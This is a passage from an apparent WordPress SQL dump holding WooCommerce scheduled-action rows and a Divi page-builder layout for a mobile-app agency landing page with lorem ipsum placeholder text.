16:45:55','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32592',0,'scheduled-action','',3),(32593,0,'2019-08-11 16:31:47','2019-08-11 16:31:47','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5046439747a1.29989705-M0rFSTTqkZcUEuYa6e66XlVPvYQ7GpM2','','','2019-08-11 18:45:55','2019-08-11 16:45:55','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32593',0,'scheduled-action','',3),(32594,0,'2019-08-11 17:45:55','2019-08-11 17:45:55','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5056000adef9.60545419-jCiXja8uNok1iPE7vLGVFeSnFFPkzueN','','','2019-08-11 19:53:04','2019-08-11 17:53:04','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32594',0,'scheduled-action','',3),(32595,0,'2019-08-11 17:45:55','2019-08-11 17:45:55','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5056003c4283.52717766-AXBRehfJwhRAFiufGxgguXU9DcqwtkSR','','','2019-08-11 19:53:04','2019-08-11 17:53:04','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32595',0,'scheduled-action','',3),(32596,0,'2019-08-11 18:53:04','2019-08-11 18:53:04','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d506506e68824.60087617-n2j1fUrTaX5vbEbypQebPindE0a7i3u7','','','2019-08-11 20:57:10','2019-08-11 18:57:10','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32596',0,'scheduled-action','',3),(32597,0,'2019-08-11 18:53:04','2019-08-11 18:53:04','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5065071faf47.28412140-wnyJtew3e7CjAYW1XbmcINA6GxGDMM2c','','','2019-08-11 20:57:11','2019-08-11 18:57:11','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32597',0,'scheduled-action','',3),(32598,0,'2019-08-11 19:57:11','2019-08-11 19:57:11','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d50794e704071.89851946-Fn91OZYBZuM97WRbrquVRcbe0UoDE4Lg','','','2019-08-11 22:23:42','2019-08-11 20:23:42','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32598',0,'scheduled-action','',3),(32599,0,'2019-08-11 19:57:11','2019-08-11 19:57:11','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d50794e7a8cc4.20548240-IyPLkuYP7h5rHmTibtaWPxpa3JzZzvAw','','','2019-08-11 22:23:42','2019-08-11 20:23:42','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32599',0,'scheduled-action','',3),(32600,0,'2019-08-11 21:23:42','2019-08-11 21:23:42','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d508818768893.77735830-xhd6g8I0jEcouUqxex2yuekm6whet4Go','','','2019-08-11 23:26:48','2019-08-11 21:26:48','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32600',0,'scheduled-action','',3),(32601,0,'2019-08-11 21:23:42','2019-08-11 21:23:42','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5088189b9b49.25528526-i8WC509v1kdafFA52XB6GovKD3iIBzmd','','','2019-08-11 23:26:48','2019-08-11 21:26:48','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32601',0,'scheduled-action','',3),(32602,0,'2019-08-11 22:26:48','2019-08-11 22:26:48','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d509841f22618.18524063-Pt5eWGitBg1CLN2QNGqFwEouC70eKYsr','','','2019-08-12 00:35:45','2019-08-11 22:35:45','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32602',0,'scheduled-action','',3),(32603,0,'2019-08-11 22:26:48','2019-08-11 22:26:48','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d509842093385.38446123-MZc4XkrsOW2FQXGL4ytH61C8u00SWKpB','','','2019-08-12 00:35:46','2019-08-11 22:35:46','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32603',0,'scheduled-action','',3),(32463,3,'2019-08-08 15:52:02','2019-08-08 13:52:02','[et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"60px\" padding_1_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" admin_label=\"Header\" _builder_version=\"3.22\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"60px\" parallax__hover=\"off\" parallax_method__hover=\"on\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|phone\"]<h1>We Create Mobile Apps So Your Users Can Enjoy Their Lives On The Go</h1>[/et_pb_text][et_pb_button button_text=\"Get Started\" button_alignment=\"left\" _builder_version=\"3.19.6\" custom_button=\"on\" button_text_size=\"12px\" button_text_color=\"#ffffff\" button_bg_color=\"#1ca5ff\" button_border_width=\"0px\" button_border_radius=\"100px\" button_letter_spacing=\"1px\" button_font=\"Poppins|600||on|||||\" button_icon=\"%%190%%\" button_on_hover=\"off\" box_shadow_style=\"preset3\" box_shadow_vertical=\"30px\" box_shadow_blur=\"40px\" box_shadow_spread=\"-16px\" box_shadow_color=\"rgba(28,165,255,0.24)\" custom_padding=\"14px|58px|14px|40px|true|false\" locked=\"off\"][/et_pb_button][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.26.6\" custom_padding=\"29.6875px|0px|0|0px|false|false\" column_structure=\"1_2,1_2\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.26.6\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" use_background_color_gradient=\"on\" background__hover_enabled=\"on\" background_color_gradient_start__hover=\"rgba(216,216,216,0)\" background_color_gradient_end__hover=\"rgba(190,196,195,0)\"][et_pb_blurb title=\"Mobile Apps\" image=\"https://companyregistration.online/wp-content/uploads/2019/08/app-12.png\" _builder_version=\"3.19.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"User Experience\" image=\"https://companyregistration.online/wp-content/uploads/2019/08/app-010-1.png\" _builder_version=\"3.19.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" custom_padding=\"29.6875px|0px|0|0px|false|false\" column_structure=\"1_2,1_2\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"VIsual Design\" image=\"https://companyregistration.online/wp-content/uploads/2019/08/app-09.png\" _builder_version=\"3.19.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"App Development\" image=\"https://companyregistration.online/wp-content/uploads/2019/08/app-11-1.png\" _builder_version=\"3.19.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-02.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"-120px|-10vw||-10%\" custom_margin_tablet=\"0px|10vw||10vw||true\" custom_margin_last_edited=\"on|desktop\" animation_style=\"roll\" animation_direction=\"top\" animation_intensity_roll=\"1%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About\" _builder_version=\"3.22\"][et_pb_row _builder_version=\"3.25\" column_structure=\"2_5,3_5\"][et_pb_column type=\"2_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"18px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"16px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut libero malesuada feugiat. Cras ultricies ligula sed magna dictum porta. Proin eget tortor risus.</p>\n<p>Pellentesque in ipsum id orci porta dapibus. Vestibulum ac diam sit amet quam vehicula elementum sed sit amet dui. </p>[/et_pb_text][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/Asset-1.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|-10vw||\" custom_margin_tablet=\"||\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"2%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Process\" _builder_version=\"3.22\" locked=\"off\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Our Design &amp; Development Process</h2>\n<p>ar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-icon-small-01.png\" align=\"right\" _builder_version=\"3.23\" max_width=\"45px\" custom_margin=\"60px||\" custom_margin_last_edited=\"on|tablet\" always_center_on_mobile=\"off\"][/et_pb_image][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"right\" locked=\"off\"]<h3>Strategy &amp; Roadmap.</h3>\n<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vivamus suscipit tortor eget felis porttitor volutpat. Donec rutrum congue leo eget malesuada.</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-icon-small-03.png\" align=\"right\" _builder_version=\"3.23\" max_width=\"45px\" custom_margin=\"60px||\" custom_margin_last_edited=\"on|tablet\" always_center_on_mobile=\"off\" locked=\"off\"][/et_pb_image][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"right\" locked=\"off\"]<h3>Visual &amp; UX Design</h3>\n<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vivamus suscipit tortor eget felis porttitor volutpat. Donec rutrum congue leo eget malesuada.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/Asset-3.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"fade\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-icon-small-05.png\" _builder_version=\"3.23\" max_width=\"45px\" custom_margin=\"60px||\" custom_margin_last_edited=\"on|tablet\" always_center_on_mobile=\"off\" locked=\"off\"][/et_pb_image][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" locked=\"off\"]<h3>Development</h3>\n<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vivamus suscipit tortor eget felis porttitor volutpat. Donec rutrum congue leo eget malesuada.</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-icon-small-09.png\" _builder_version=\"3.23\" max_width=\"45px\" custom_margin=\"60px||\" custom_margin_last_edited=\"on|tablet\" always_center_on_mobile=\"off\" locked=\"off\"][/et_pb_image][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" locked=\"off\"]<h3>Launch &amp; Monitor</h3>\n<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vivamus suscipit tortor eget felis porttitor volutpat. Donec rutrum congue leo eget malesuada.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>What We Build For</h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\" column_structure=\"1_5,1_5,1_5,1_5,1_5\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Healthcare</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Food &amp; Drink</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>ECommerce </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Gaming </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Event </h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\" column_structure=\"1_5,1_5,1_5,1_5,1_5\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Sports &amp; Fitness </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Real Estate </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>productivity </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Hospitality </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Education </h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" custom_padding=\"27px|0px|27px|0px|false|false\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_text=\"Get Started\" button_alignment=\"center\" _builder_version=\"3.19.6\" custom_button=\"on\" button_text_size=\"12px\" button_text_color=\"#ffffff\" button_bg_color=\"#1ca5ff\" button_border_width=\"0px\" button_border_radius=\"100px\" button_letter_spacing=\"1px\" button_font=\"Poppins|600||on|||||\" button_icon=\"%%190%%\" button_on_hover=\"off\" box_shadow_style=\"preset3\" box_shadow_vertical=\"30px\" box_shadow_blur=\"40px\" box_shadow_spread=\"-16px\" box_shadow_color=\"rgba(28,165,255,0.24)\" custom_padding=\"14px|58px|14px|40px|true|false\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Our Work\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#edf8ff\" background_color_gradient_end=\"#ffffff\" background_color_gradient_direction=\"109deg\" custom_margin=\"|40px||40px||true\" custom_margin_phone=\"|10px||10px||true\" custom_margin_last_edited=\"on|desktop\" custom_padding=\"0|0px|54px|0px|false|false\"][et_pb_row _builder_version=\"3.25\" background_color=\"#ffffff\" width=\"100%\" max_width=\"100%\" custom_padding=\"27px|0px|90px|0px|false|false\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Case Studies</h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-04.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|phone\" custom_margin=\"-130px||\" animation_style=\"roll\" animation_direction=\"bottom\" animation_intensity_roll=\"1%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" link_font=\"||||||||\" link_text_color=\"#ab5eff\" header_font=\"||||||||\" header_3_font=\"Poppins|600|||||||\" header_3_font_size=\"20px\" header_3_line_height=\"1.6em\" header_3_font_size_phone=\"16px\" header_3_font_size_last_edited=\"on|phone\" locked=\"off\"]<h3>Divi Defenders</h3>\n<p><a href=\"#\">Gaming</a></p>\n<p>Pellentesque in ipsum id orci porta dapibus. Nulla quis lorem ut libero malesuada feugiat. Sed porttitor lectus nibh. Cras ultricies ligula sed magna dictum porta. Curabitur aliquet quam id dui posuere blandit. Donec sollicitudin molestie malesuada. Pellentesque in ipsum id orci porta dapibus.</p>\n<p><em>50k+ Downloads • 2k+ Reviews</em></p>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"Poppins|600|||||||\" text_text_color=\"#000000\" text_font_size=\"30px\" text_line_height=\"80px\" header_font=\"||||||||\" border_radii=\"on|100px|100px|100px|100px\" border_width_all=\"4px\" border_color_all=\"#ab5eff\" text_orientation=\"center\" max_width=\"88px\" custom_padding=\"|||||false\"]<p>4.7</p>[/et_pb_text][et_pb_button button_text=\"Download\" _builder_version=\"3.19.6\" custom_button=\"on\" button_text_size=\"12px\" button_text_color=\"#ab5eff\" button_bg_color=\"#f0e8ff\" button_border_width=\"0px\" button_border_radius=\"100px\" button_letter_spacing=\"1px\" button_font=\"Poppins|600||on|||||\" button_icon=\"%%190%%\" button_on_hover=\"off\" box_shadow_style=\"preset3\" box_shadow_vertical=\"30px\" box_shadow_blur=\"40px\" box_shadow_spread=\"-16px\" box_shadow_color=\"rgba(28,165,255,0.08)\" custom_padding=\"14px|58px|14px|40px|true|false\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" link_font=\"||||||||\" link_text_color=\"#3fd3ce\" header_font=\"||||||||\" header_3_font=\"Poppins|600|||||||\" header_3_font_size=\"20px\" header_3_line_height=\"1.6em\" header_3_font_size_phone=\"16px\" header_3_font_size_last_edited=\"on|phone\" locked=\"off\"]<h3>Social Analytics Tracker</h3>\n<p><a href=\"#\">Productivity</a>, <a href=\"#\">Business</a></p>\n<p>Pellentesque in ipsum id orci porta dapibus. Nulla quis lorem ut libero malesuada feugiat. Sed porttitor lectus nibh. Cras ultricies ligula 